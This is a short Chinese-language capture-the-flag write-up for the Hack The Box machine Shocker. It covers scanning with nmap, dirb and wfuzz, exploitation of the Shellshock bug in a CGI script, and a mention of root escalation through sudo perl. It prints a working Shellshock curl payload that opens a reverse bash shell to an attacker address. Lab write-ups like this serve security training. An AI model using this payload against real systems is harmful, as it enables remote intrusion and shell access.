Hack The Box::Shocker

2024-02-01 15:11:40

0x00 信息收集

nmap -Pn -sV -T 4 10.10.10.56
Hack The Box::Shocker

浏览器访问80端口查看相关信息
Hack The Box::Shocker

查看网页源码未发现敏感信息,尝试爆破路径
dirb http://10.10.10.56
Hack The Box::Shocker

继续尝试对/cgi-bin目录进行爆破,最终得到/user.sh
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.10.10.56/cgi-bin/FUZZ.sh
Hack The Box::Shocker

访问文件,下载后得到如下信息
Hack The Box::Shocker

0x01 漏洞利用

通过google搜索cgi-bin和shell相关的内容,最终确定利用点为shellchock
参考内容:https://en.wikipedia.org/wiki/Shellshock_(software_bug)
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/4444 0>&1'" http://10.10.10.56/cgi-bin/user.sh
Hack The Box::Shocker
Hack The Box::Shocker

0x02 权限提升

通过sudo -l发现可以通过perl提升到root权限
Hack The Box::Shocker
Hack The Box::Shocker

上一篇:CSS Hack


下一篇:Hack The Box::Jerry